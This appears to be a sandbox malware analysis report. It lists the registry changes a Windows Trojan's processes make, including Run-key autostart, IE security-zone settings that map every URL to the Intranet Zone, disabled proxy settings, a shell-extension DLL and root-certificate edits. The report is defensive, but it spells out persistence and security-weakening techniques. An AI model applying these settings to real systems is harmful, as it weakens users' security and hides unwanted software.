[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"On" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level" = ""

The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level"

The process FhCalendar.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 49 09 89 D2 FF E1 F4 98 54 56 A4 80 9E BA 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"update.exe" = "Update 应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The process FhCalendar.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "FhCalendar.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402636056"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 70 F7 CB 16 DA C6 8E 5B CD E0 CF CD 6F 2A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wujiime.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayVersion" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\VERSION]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"Publisher" = "Wuji"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"UninstallString" = "%Program Files%\Wuji\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}]
"(Default)" = "pIContextMenu.ShellExt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\ProgID]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\0\win32]
"(Default)" = "%System%\catsrvuz.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"URLInfoAbout" = "Wj"

[HKCR\Directory\Background\shellex\ContextMenuHandlers\with]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"(Default)" = "%System%\catsrvuz.dll"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0]
"(Default)" = "IContextMenu wj"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}]
"(Default)" = "_ShellExt"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\pIContextMenu.ShellExt\Clsid]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A2 42 55 B5 34 36 CF C2 A6 05 52 4A B4 70 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayName" = "无极输入法 3.6"

[HKCU\Software\VB and VBA Program Settings\jcity\tj]
"nt" = "55"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\pIContextMenu.ShellExt]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process MSIB.tmp:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 5B 7B 66 1D D9 48 61 68 AD 61 12 39 C3 6E 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\xxdd]
"SportLive.exe" = "直播中心"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process xxdd_165.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 12 9D AB 46 B0 B5 90 35 C3 17 34 CC 48 AC 4B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process updroots.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 71 72 94 D7"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]

The Trojan deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"File"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5"

The process 114gglm_016.exe:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 59 8D 28 D9 17 87 C6 FB 54 26 9D 38 F0 38 15"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"file" = "114gglm_016"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"

The process Update.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 55 5A 20 7D FB DF 55 8B 27 30 96 FA A1 F4 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fhrl_6_12001.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\thyz\FhCalendar.exe]
"(Default)" = "%Program Files%\fhrl\FhCalendar.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"DisplayName" = "·çºÍÈÕÀú 1.00.001"
"DisplayVersion" = "1.00.001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"UninstallString" = "%Program Files%\fhrl\Fhuninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"URLInfoAbout" = "http://www.fhrlw.com"
"DisplayIcon" = "%Program Files%\fhrl\FhCalendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"Publisher" = "ÌÆº²Ò×ÕßÐÅÏ¢¼¼ÊõÓÐÏÞ¹«Ë¾"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7F ED 19 00 E5 EE 7D 60 1D 7F 38 E2 5F C3 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process fhsli_6_12001.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 04 CF D3 52 C8 23 F1 5E 97 A3 33 40 02 19 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process netsh.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

